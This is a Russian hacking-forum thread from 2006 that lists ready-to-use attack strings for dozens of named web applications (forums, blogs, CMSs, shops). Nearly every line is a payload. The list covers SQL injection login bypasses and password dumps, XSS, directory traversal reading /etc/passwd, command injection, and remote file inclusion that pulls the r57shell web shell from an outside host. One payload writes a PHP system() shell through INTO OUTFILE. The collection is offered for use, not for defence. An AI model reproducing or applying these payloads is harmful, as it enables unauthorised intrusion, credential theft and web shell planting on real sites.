Энциклопедия уязвимых скриптов

Обсуждение в разделе «Веб-уязвимости», начал(-а) DIAgen, 1.06.2006.

  1. DIAgen

    DIAgen Banned Life!

    Регистрация:
    2.05.2006
    Сообщения:
    1 071
    Одобрения:
    374
    Репутация:
    265
    Энциклопедия уязвимых скриптов

    ----------------------------------------------------------------

    Так же обратите внимание на темы:





    ----------------------------------------------------------------

    Эта коллекция уязвимостей собиралась для личного использования. Если кому-нибудь пригодится, значит все сделано не зря!

    Форумы​

    phpBB v.2.0.15 Выполнение php кода в viewtopic.php
    viewtopic.php?t=1&highlight='.printf(md5(test)).'
    PBLang 4.65 Локальный include файлов
    setcookie.php?u=../../../../../../../../../../etc/passwd%00
    setcookie.php??u=../../../../../../../../../../boot.ini%00

    PHPTB v.2.0 Include файлов
    /classes/admin_o.php?absolutepath= http://rst.void.ru/download/ r57shell.txt
    MailGust v.1.9 SQL Injection
    post запрос index.php
    method=remind_password&list=maillistuser&fromlist=maillist&frommethod=showhtmllist&email=1%27%
    20union%20select%20%2A%20from%20force_sql_error%2F%2A%40hotmail%2Ecom&submit=Ok&showAvatar

    Chipmunk Forum XSS
    newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)
    %3E%3C/IFRAME%3E

    oaboard v.1.0 SQL Injection
    forum.php?channel=0%20union%20select%20*%20from%20force_mysql_table_error
    Phorum 5.0.20 SQL Injection
    search.php?1,search=%20,page=1,match_type=ALL,match_dates=30,match_forum=ALL,body=
    1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error

    Cyphor 0.19 XSS
    /include/footer.php?t_login=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    W-Agora 4.2.0 XSS
    /templates/admin/login_form.php?msg_login=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
    WizForum 1.20 SQL Injection
    ForumTopicDetails.php?TopicID=11111111%20union%20Select%20*%20from%20EronatedInex
    istentTable

    EkinBoard 1.0.3 SQL Injection
    admin/index.php ?page=general&step=2
    Cookie: username=%27or+isnull%281%2F0%29+AND+level%3D3%2F%2A; password=
    Snitz Forums 2000 v.3.4.05 XSS
    post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&type=xss-${random}
    PHP-Post 1.0 XSS
    profile.php ?user='%3CIFRAME%20SRC=javascript:alert(%2527xss-${random}%2527)%3E%3
    C/IFRAME%3E

    WSN Forum 1.21 SQL Injection
    memberlist.php ?action=profile&id=1'%20select%20*%20from%20force_mysql_warning
    sCssBoard 1.12 XSS
    index.php ?act=search-results
    post search_term=%3Cscript%3Ealert%28%27wvs-${random}%27%29%3C%2Fscript%3E+&sortby=relevancy

    freeForum 1.1 SQL Injection
    forum.php?mode=thread&thread=force_mysql_fetch_object_warning
    Orca Forum 4.3.b SQL Injection
    forum.php ?msg=2'force_mysql_num_rows_warning
    Pearl Forums 2.4 SQL Injection
    index.php ?mode=forums&forumId=1%20union%20select%20*%20from%20force_error
    SimpleBBS v.1.1 Выполнение php кода
    index.php ?v=newtopic&c=1
    POST name=<?php echo md5("test");?>&subject=mysubject&message=mymessage&sendTopic=Send

    ADP Forum v.2.0.2 Информация о пользователя
    /users/
    ADN Forum v.1.0b SQL Injection
    verpag.php?pagid=999'%20and_force_mysql_error/*
    MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы
    search.php?s=de1aaf9b&action=do_search&keywords=a&srchtype=3
    MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта
    /modules/logon.mod.php
    Pentacle In-Out Board v.6.03.0.0080 SQL Injection
    login.asp POST username=anypassword&userpassword=%27+or+%271%27%3D%271&Submit=Log+in
    Battleaxe Software Forums v.2.0 XSS
    failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext

    PHP Библиотеки​

    PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke
    Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )
    xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php

    POST <?xmlversion="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>','')); printf(md5(acunetix_wvs_security_test)); exit;//</name></value></param></params></methodCall>
    ADOdb
    1) SQL Injection
    /server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
    2) Выполнение функции php
    /tests/tmssql.php?do=phpinfo

    Network tools​

    phpLDAPadmin 0.9.6 Выполнение php кода
    welcome.php ?custom_welcome_page= http://rst.void.ru/download/r57shell.txt
    Netquery [host] Произвольное выполнение команд
    nquser.php POST
    1) querytype=dig&host=a%27%7Ccat%20%27%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17
    2) querytype=dig&host=%7Ccat%20%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17


    Календари и Планировщики​

    phpCommunityCalendar v.4.0.3 Обход Логина
    webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+%2F*&Password=&Returned=1
    Calendarix v.1.6 SQL Injection
    cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*&password=any
    Teca Diary Personal Edition v.1.0 SQL Injection
    index.php?mm='%20force_sql_error&yy=2006
    CALimba v.0.99.2 Sql Injection
    index.php POST ute_login=%27%29+or+isnull%281%2F0%29%2F*&ute_password=anypassword&cmdOK=Login%21
    Maian Events v.1.00 SQL Injection
    menu.php?month='forceerror'

    Блоки новостей​

    myBloggie 2.1.3 SQL Injection
    login.php POST username=%27+or+isnull%281%2F0%29+%2F*&passwd=&submit=Log+In
    Simplog 0.9.1 SQL Injection
    archive.php?blogid=force_error_for_test_reason
    Zomplog 3.4 XSS
    get.php?username=%3Cbr%3E%3Cb%3Exss%3C/b%3E%3Cbr%3E
    CuteNews 1.4.1 Shell Injection
    show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22test%22)
    ;%20die;?%3E.%22%20HTTP/1.0\r\n
    Cute News 1.4.1 Local File Inclusion
    show_archives.php?template=../../../../../../../../../../etc/passwd%00
    show_archives.php?template=../../../../../../../../../../boot.ini%00

    SimpleBlog v.2.1 SQL Injection
    default.asp ?view=archives&month=%22generate_error&year=2004
    Bit5blog v.8.1 SQL Injection
    admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2F*&password=%27+or+isnull%281%2F0%29%2F*
    WebspotBlogging v.3.0 SQL Injection
    login.php POST username=%27+or+isnull%281%2F0%29%2F*&password=anypassword
    e-moBLOG v.1.3 SQL Injection
    /admin/index.php POST login=aaa%27+union+select+%27bbb%27%2C+%27161da2fa81d32d4071ee16f7f77cb463%27%2F*&password=
    any_password

    miniBloggie v.1.0 SQL Injection
    login.php POST user=%27+or+isnull%281%2F0%29%2F*&pwd=%27+or+isnull%281%2F0%29%2F*&submit=Log+In
    Text Rider v.2.4 Список пользователей
    /data/userlist.txt
    AndoNET Blog SQL Injection
    index.php?ando=comentarios&entrada=1'generate%20error
    Loudblog v.0.4 PHP Code Injection
    /loudblog/inc/backend_settings.php?GLOBALS[path]= http://rst.void.ru/download/r57shell.txt
    PluggedOut Blog v.1.9.9c SQL Injection
    exec.php?action=comment_add&entryid=force_error
    Clever Copy v.3.0 SQL Injection
    mailarticle.php?ID='UNION%20SELECT%200,0,0,0,0,0,username,password,0,0,0,0,0,0,0,0,0
    %20FROM%20CC_admin/*

    Magic News Lite v.1.2.3 Code Injection
    preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
    WordPress v.2.0.1 Раскрытие пути
    /wp-includes/default-filters.php
    sBlog v.0.7.2 XSS
    search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
    Maian Weblog v.2.0 SQL Injection
    print.php?cmd=log&entry=1'%20or%20generate_error=2
     
    #1 DIAgen, 1.06.2006
    В последний раз редактировалось модератором: 21.08.2009
    Это одобряют 27 пользоветелей.
  2. DIAgen

    DIAgen Banned Life!

    Регистрация:
    2.05.2006
    Сообщения:
    1 071
    Одобрения:
    374
    Репутация:
    265
    Faq Systems​

    phpMyFAQ 1.5.1 SQL Injection
    admin/password.php POST username=%27+or+isnull%281%2F0%29+%2F*&email=1@2.com
    A-FAQ 1.0 SQL Injection
    faqDsp.asp?catcode=12%20union%20select%20name%20from%20msysobjects%20in%20'\nopath\
    sqlerr

    Atlantis Knowledge Base Software v.3.0 SQL Injection
    search.php POST searchStr=%25%27+union+select+*+from+force_mysql_warning%2F*
    ASP Survey v1.10 SQL Injection
    /Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&Dest=http%3A%2F%2Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
    FDefault.asp

    Owl v.0.82 File Inclusion
    /lib/OWL_API.php?xrms_file_root=nonexistent_test_includefile%00

    Web Portals​

    PHPNuke 7.8 Remote Directory Traversal
    modules.php?name=Search&file=../../../../../../../../../../etc/passwd%00
    modules.php?name=Search&file=../../../../../../../../../../../boot.ini%00


    Партнерские системы​

    TWiki rev Parameter Remote Command Execution Vulnerability
    view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
    view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cboot%2Eini

    PmWiki 2.0.12 q-Parameter XSS
    pmwiki.php ?n=Site.Search?action=search&q=test_search_item%27%20onMouseOver%3D%27alert%28%22wvs-xss-magic
    -string-${random}%22%29%3B%27%20

    ProjectApp v.3.3 XSS
    default.asp ?skin_number=XSS.css%22%3E%3Cscript%3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
    IntranetApp v.3.3 XSS
    login.asp ?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
    dotproject v.2.0.1 File Inclusion
    includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
    Qwiki v.1.5.1 XSS
    index.php?page=Home&from='%3Cscript%3Ealert(%22xss-${random}%22)%3C/script%3E

    Administration Tools​

    phpMyAdmin grab_globals.lib.php
    libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
    ../../../etc/passwd&subform[1]
    libraries/grab_globals.lib.php POST
    usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
    ../../../boot.ini&subform[1]

    phpMyAdmin XSS
    queryframe.php?lang=en-iso-8859-1&server=1&hash=">='%3C/a%3E%3CIFRAME%
    20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E

    phpMyAdmin Раскрытие пути
    libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&
    allow_recoding=true)


    CMS Systems​

    PHP-Fusion 6.00.109 SQL Injection
    faq.php?cat_id=1%27%20or%20force_mysql_error%3D%272
    MySource 2.14.0 File Inclusion
    init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
    e107 v0617 SQL Injection
    e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&usubmit=Continue
    lucidCMS 1.0.11 SQL Injection
    index.php?command=panel
    PhpWebThings 1.4.4 SQL Injection
    forum.php?forum=-1%20union%20select%20password,password,null,null%20from%
    20test_mysql_injection%20where%20uid=1/*

    Envolution v.1.1.0 SQL Injection
    modules.php?op=modload&name=News&file=index&catid=%221%22%20AND%20force_error=error
    Acidcat v.2.1.13 SQL Injection
    default.asp?ID=26%20union%20select%201,2,2,3,password,5,6%20from%20Configuration
    DEV v1.5 SQL Injection
    index.php?session=0&action=openforum&cat=force_error
    SiteEnable v.3.3 XSS
    login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
    PortalApp v.3.3 XSS
    login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
    Typo3 v.3.8.1 Раскрытие пути
    /tslib/showpic.php
    RunCMS v.1.3a5 XSS
    /modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');
    %3C/script%3E%3Cbr%20name=%22nothing

    Mambo v.4.5.3h SQL Injection
    /index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypassword&option=login&Submit=Login&op2=login&lang
    =english&return=${file}&message=0

    Dragonfly CMS v.9.0.6.1 XSS
    /index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat
    =0&news_search_comments=0&coppermine=

    Nodez v.4.6.1.1 XSS
    /index.php?node=system&op=block%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)
    %3C/script%3E&block=3&bop=more

    XOOPS v.2.0.11 SQL Injection
    /xmlrpc.php POST <?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value>
    <string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>


    Gallery Applications​

    Gallery "g2_itemId" локальный иклуид
    main.php?g2_itemId=/../../../../../../../../../../../boot.ini%00
    main.php?g2_itemId=/../../../../../../../../../../../etc/passwd%00
    /upgrade/index.php ?stepOrder[]=../../../../../../../../include_inexistent_file.txt%00

    Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию
    relocate_server.php POST continue=1
    Instant Photo Gallery v.1.0 SQL Injection
    portfolio.php?cat_id="force_sql_error
    Enhanced Simple PHP Gallery v.1.7 Раскрытие пути
    index.php?dir=inexistent_directory
    WhiteAlbum v.2.5 SQL Injection
    pictures.php?dir=force_mysql_warning
    LinPHA v.1.0 Local File Inclusion
    /docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
    /docs/index.php?lang=/../../../../../../../../../../boot.ini%00


    Script Collections​

    Codegrrl Arbitrary Local File Inclusion
    protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd%00
    protection.php?action=logout&siteurl=../../../../../../../../../../boot.ini%00

    Techno Dreams Products SQL Injection
    admin/login.asp POST userid=%27union+all+select+%271%27%2C%271%27+from+admin+where+%27%27%3D%27&passwd=1&submit=Login
    AlstraSoft Template Seller Pro 3.25 File Inclusion
    include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
    AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
    admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F*&passwd=&B1=Login
    OpenEdit v.4.0 XSS
    /store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E

    Электронная коммерция​

    Zend Cart 1.2.6 SQL Injection
    admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
    +INTO+OUTFILE+%27shell.php%27+FROM+force_table_error%2F*&submit=resend

    Lizard Cart CMS v.1.0.4 SQL Injection
    detail.php?id=-1'
    My Amazon Store Manager v1.0 XSS
    /search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
    CRE Loaded v.6.15 XSS
    /admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/
    script%3E&Mode=apparel

    NZ Ecommerce SQL Injection
    /index.php?action=Information&informationID=1%20and%20generate_error=error

    Guest Book Applications​

    Ades Guestbook v.2.0 XSS
    read.php ?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3
    C%2Fscript%3E


    Development Tools​

    Mantis 1.00 File Inclusion
    bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd%00
    bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../../boot.ini%00

    Flyspray 0.9.8 XSS
    index.php ?tasks=all%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%26project%3D0
    Gemini v.2.0 XSS
    /issue/createissue.aspx?rtcDescription$RadEditor1=1><script>alert(${random});</script>

    Другие инструменты​

    Digital Scribe 1.4 SQL Injection
    login.php POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
    ATUTOR 1.5.1 SQL Injection
    password_reminder.php POST form_password_reminder=true&form_email=%27
    PHP Advanced Transfer Manager System локальный include
    viewers/txt.php?filename=../../../../../../../../../../boot.ini%00
    viewers/txt.php?filename=../../../../../../../../../../etc/passwd%00

    Chipmunk Topsites XSS
    recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
    Chipmunk Directory XSS
    recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
    Gcards 1.44 limit parameter SQL Injection
    news.php ?limit=force_sql_error
    phpSysInfo 2.3 XSS
    index.php ?VERSION=%22%3E%3Cscript%3Ealert('FORCE_XSS')%3C/script%3E
    Advanced Poll 2.03 XSS
    popup.php ?poll_ident=%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E
    PHPGreetz 0.99 Remote File Include
    content.php?content=http://rst.void.ru/download/r57shell.txt
    eFiction 1.1 XSS и SQL Injection
    titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
    Google API Search Engine v.1.3.1 XSS
    index.php?REQ=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmit=Submit
    phpArcadeScript v.2.0 XSS
    /includes/tellafriend.php?about=game&gamename=%3Cscript%3Ealert(${random});%3C/script%3E
     
    #2 DIAgen, 1.06.2006
    В последний раз редактировалось модератором: 5.10.2007
    Это одобряют 7 пользоветелей.
  3. DIAgen

    DIAgen Banned Life!

    Регистрация:
    2.05.2006
    Сообщения:
    1 071
    Одобрения:
    374
    Репутация:
    265
    Update

    Code:
    Форумы
    phpBB v.1.20 локальный инклуид
    /admin/admin_hacks_list.php?setmodules=3D1&board_conf=ig[default_lang]=3Denglish&phpEx=3D${random}
    MyBulletinBoard v.1.1.5 SQL инъекция
    http://www.milw0rm.com/exploits/2012
    dotNetBB v2.42EC.SP3 XSS
    /iforget.aspx POST em=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
    Toast Forums v.1.6 XSS
    ?action=posts&sub=search&fid-1&author=r0t&subject=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3C
    SKForum v.1.5 XSS
    ?areaID=%3Cscript%3Ealert('XSS')%3B%3C/script%3E&time=%3Cscript%3Ealert('XSS')%3B%3C/script%3E
    Invision Power Board v.2.0.3 XSS
    Шаг 1
    ?act=Search&CODE=01 
    POST
    keywords=test&namesearch=&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=topics
    Шаг 2
    GET
    %2F%24%7B%69%6E%63%6C%75%73%69%6F%6E%5F%70%61%72%61%6D%65%74%65%72%73%7D%3D%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%74%65%73%74%22%29%3B%3C%2F%73%63%72%69%70%74%3E
    Invision Power Board v2.1.6 SQL инъекция
    CLIENT-IP: ' UNION SELECT 'test',1,1,1/*
    WWWThreads Forum XSS
    calendar.php?week=%22%3E%3Cscript%3Ealert(${random})%3C/script%3E
    MercuryBoard v.1.1.4 SQL инъекция
    ?a=active - User-Agent: 123456'
    Integramod Portal  v.2.0 локальный инклуид
    ?phpbb_root_path=http://evalphp
    
    Календари и Планировщики
    WebCalendar v.4.0 SQL инъекция
    ?EventID=arbitrary_id%20or%20sql_injection_tet=test
    Connect Daily v.3.2.9  XSS
    ?start=<script>alert("XSS");</script>
    Thyme v.1.3 XSS
    POST searchfor=%3Cscript%3Ealert%28%22${random}%22%29%3B%3C%2Fscript%3E
    MaxxSchedule v.1.0 XSS
    ?Error=<script>alert("XSS");</script>
    MultiCalendars v.3.0  SQL инъекция
    ?calsids=sql_error
    myEvent v.1.4 php инклуид
    ?myevent_path=http://evalphp?
    TeamCal Pro v.2.8.001 локальный инклуид
    ?tc_config[app_root]=http://evalphp?
    
    Блоки новостей
    myBloggie v.2.1.4 SQL инъекция
    POST title='generate_error)/*&url=http://
    Simplog v.0.9.1 Локальный инклуид
    ?cmd=ls%20-la&s=http://evalphp%00
    Cute News v.1.4.5 XSS
    ?dosearch=yes&title="><script>alert("XSS");</script>&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day =&to_date_month=&to_date_year=
    WordPress v.2.0.3 SQL инъекци
    ?paged=-1
    Simple PHP Blog v.0.4.7.1 Локальный инклуид
    ?blog_language=../../../../../../../../../../../inexistent_directory/inexistent_file.php%00
    EasyMoblog v.0.5.1 XSS
    ?i=nothing.txt%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cimg%20src=%22img/posts/nothing.txt%22
    bMachine v.2.9b XSS
    POST key=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3C
    Artmedic Newsletter v.4.1.2 Выполнение php
    ?logfile=info.php&logtime=000060&email=%3C?php%20echo%20md5(%22test%22);%20?%3E
    Eggblog v.3.6 SQL инъекция
    ?id='1234567
    pppBlog v.0.3.8 Локальный инклуид
    ?files[0]=../config/admin.php
    BLOG:CMS v4.0.0 SQL инъекция
    ?id=9999999'/**/UNION/**/SELECT/**/mpassword/**/FROM/**/nucleus_member/**/WHERE/**/mnumber=1/*
    DeluxeBB v1.08 SQL инъекция
    Cookie: membercookie=test;memberid=1;memberpw=')or isnull(1/0) or(1='
    
    Различные скрипты (редкие)
    Digital Scribe 1.4 SQL
    POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
    ATUTOR 1.5.1 SQL
    POST form_password_reminder=true&form_email=%27
    PHP Advanced Transfer Manager System Disclosure
    ?filename=../../../../../../../../../../etc/passwd%00
    Gcards v.1.45 SQL
    username=%27+or+isnull%281%2F0%29%2F*&userpass=%27+or+isnull%281%2F0%29%2F*
    PHPGreetz 0.99 Инклуид
    ?content=http://evalphp/
    eFiction 1.1 SQL-XSS
    ?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%22XSS%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
    DoceboLMS 2.04 Инклуид
    ?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder=
    Enterprise Connector v.1.02  SQL
    POST loginid='or isnull(1/0) /*
    PhpGedView v.3.3.7 Инклуид
    ?PGV_BASE_DIRECTORY=../../../../../../../../../etc/passwd
    PHPjournaler v.1.0 SQL
    ?readold=999%20union%20select%201,password,3,4,name,6%20from%20eronated_table_name/*
    PHPStatus v.1.0 SQL
    POST username=%27or+isnull%281%2F0%29+%2F*&password=anypassword&submit=Login
    NetOffice v.2.5.3-pl1 SQL
    POST loginForm=%27+or+acuerro%3D1%2F*&send=Send
    phpListPro v.2.0.0  Инклуид
    ?returnpath=http:/evalphp%00
    phpWebFTP v.3.2 Локальный инклуид
    POST server=&port=21&user=qqq&password=qqq&language=../../../../../../../../../../etc/passwd%00
    EDirectoryPro 2006-05-09 SQL
    ?Category=all&keyword=sql_error%27&mode=date
    Timesheet PHP 1.2.1 SQL
    POST redirect=%2Ftest%2Ftimesheet_1_2_1%2Fcalendar.php&username=testuser%27&password=testpassword%27&Login=submit
    Web-News v.1.6.3 Инклуид
    ?content_page=http://evalphp?
    
    Faq Systems
    Absolute FAQ Manager v.4.0  XSS
    POST topicid=1&question=%3Cscript%3Ealert%28%22$XSS%22%29%3B%3C%2Fscript%3E&imageField.x=14&imageField.y=6
    PHPKB v.1.5 XSS
    POST searchkeyword=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&category=0&Submit=Search+Knowledge+Base
    
    Web Portals
    SQuery v.4.5 (phpNuke module) Инклуид
    ?libpath=http://evalphp?
    
    Партнерские системы
    PHPCollab v.2.4 SQL
    POST loginForm=%27error%27+or+error
    Tiki Wiki v.1.9.3.1 XSS
    ?days=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert(%22XSS%22);%3C/scr%3C/script%3Eipt%3E%3E
    DokuWiki v.2006-03-09b dwpage.php php-eval
    X-FORWARDED-FOR: <?php echo md5("acunetix_test_text");?>
    
    Administration Tools
    Confixx 3 Professional v.3.1.2 SQL
    ?SID='%22
    Pivot v1.30 RC2 
    edit_new.php?Paths[extensions_path]=ftp://username:password@somehost.com/
    edit_new.php?Paths[extensions_path]=/etc/passwd%00
    blogroll.php?fg=[XSS]
    blogroll.php?line1=[XSS]
    blogroll.php?line2=[XSS]
    blogroll.php?bg=[XSS]
    blogroll.php?c1=[XSS]
    blogroll.php?c2=[XSS]
    blogroll.php?c3=[XSS]
    blogroll.php?c4=[XSS]
    editor/edit_menu.php?name=[XSS]
    editor/edit_menu.php?js_name=[XSS]
    photo.php?h=><script>alert(document.cookie)</script>
    photo.php?w=><script>alert(document.cookie)</script> 
    cPanel v.10.8.2.118 XSS
    ?dir=%3E%3Cscript%3Ealert(XSS)%3C/script%3E
    
    CMS Systems
    Simpleboard v1.1.0 (Mambo component) Инклуид
    ?sbp=http://evalphp?
    Tim-online PHPBB v1.2.4RC3 (Mambo component) Инклуид
    ?phpbb_root_path=http://evalphp?
    Galleria v1.0 (Mambo component) Инклуид
    ?mosConfig_absolute_path=http://evalphp?
    Pearl For Mambo v.1.6  Инклуид
    ?GlobalSettings[templatesDirectory]=http://evalphp?
    Videodb (Mambo component) v.0.3 Инклуид
    ?mosConfig_absolute_path=http://evalphp?
    Loudmouth (Mambo component)  v.4.0 Инклуид
    ?mosConfig_absolute_path=http://evalphp?
    Mambo up to v.4.6.1 SQL
    Cookie: usercookie[password]=%27 or 1=1/*; usercookie[username]=admin
    99articles Инклуид
    ?page=http://evalphp?
    OpenPHPNuke v.2.3.3 Инклуид
    ?root_path=http://evalphp?
    Ottoman  v.1.1.2 Локальный инклуид
    ?default_path=path%00
    Ajax Portal v.3.0 SQL
    POST rs=searchBoxes&rst=&rsrnd=1152608713921&rsargs[]=search%20%25%27%29%20LIMIT%200%20UNION%20SELECT%201337%2Cusername%2Cpassword%2Cgenerate_error%20FROM%20p${random}/*&rsargs[]=all&rsargs[]=0
    MyPHP CMS v.0.3 Инклуид
    ?installed=23&domain=http://evalphp?
    Plume CMS v1.3 Инклуид
    ?_PX_config[manager_path]=http://evalphp?
    SmartSiteCMS v1.0  Инклуид
    ?root=http://evalphp?
    GeekLog v1.4.0 Инклуид
    ?_CONF[path]=http://evalphp?
    Etomite CMS v.0.6.1 SQL
    POST rememberme=1&location&username=99999999$'/**/UNION/**/SELECT/**/0,'acunetixtest',MD5('acunetixtest'),0,0,0,0,0,0,0,0,0,0,0,0,0,0/*&password=acunetixtest&thing&submit=Login&licenseOK=1
    SaveWebPortal v.3.4 Инклуид
    ?SITE_Path=http://evalphp?
    phpFullAnnu v.5.1 Инклуид
    ?repmod=http://evalphp?
    
    Gallery Applications
    JetPhoto Server v.1.x XSS
    ?name=%22%3E%3Cscript%3Ealert(XSS);%3C/script%3E
    photokorn v.1.542 SQL
    ?action=showgal&cat=[sql]
    PhotoPost v.4.6 Инклуид
    ?PP_PATH=http://evalphp?
    
    Development Tools
    Mantis 1.00 Локальный инклуид
    ?t_core_path=../../../../../../../../etc/passwd%00
    Flyspray 0.9.8 XSS
    ?tasks=all"><script>alert("XSS")</script>&project=0
    Gemini v.2.0 XSS
    ?rtcDescription$RadEditor1=1><script>alert(XSS);</script>
    paBugs v.2.0b3 Инклуид 
    ?path_to_bt_dir=http://evalphp?
    
    Электронная коммерция
    QuickEStore v.7.9 SQL
    ?CFID=&CFTOKEN=&CategoryID=[sql]
    Leadhound 2006-04-28  XSS
    ?login=<script>alert("XSS");</script>
    SunShop Shopping Cart v.3.5 XSS
    ?action=item&id=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
    OrbitHYIP v.2.0 XSS
    ?referral=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22XSS%22%29%3B%3C%2F%73%63%72%69%70%74%3E
    CyberBuild 06.05.03 XSS
    ?SessionID=[%22%3E%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
    PhpHostBot v.1.0 Инклуид
    ?page=http://evalphp?
    PHP Simple Shop v.2.0 Инклуид
    ?abs_path=http://evalphp?
    CubeCart v.2.0.7 XSS
    ?la_pow_by=%3Cscript%3Ealert(XSS)%3C/script%3E
    osCommerce v.2.2 XSS
    ?zone=%3Cscript%3Ealert(XSS)%3C/script%3E
    
    Ну тут уже так себе, не чего особеного нет!!!
    Creative Community Portal v.1.1 SQL
    ?article_id='
    WoWRoster v.1.5.0 Инклуид
    ?subdir=http://evalphp?
    Popper v.1.41.r2 Инклуид
    ?form=http://evalphp?
     
    Это одобряют 3 пользоветелей.
  4. +StArT+

    +StArT+ Elder - Старейшина

    Регистрация:
    10.02.2007
    Сообщения:
    34
    Одобрения:
    48
    Репутация:
    6
    + без комментариев!

    И от меня парочку. ;)

    Ananda Real Estate 3.4 SQL Injection

    list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201

    Enthrallweb ePhotos 1.0 SQL Injection

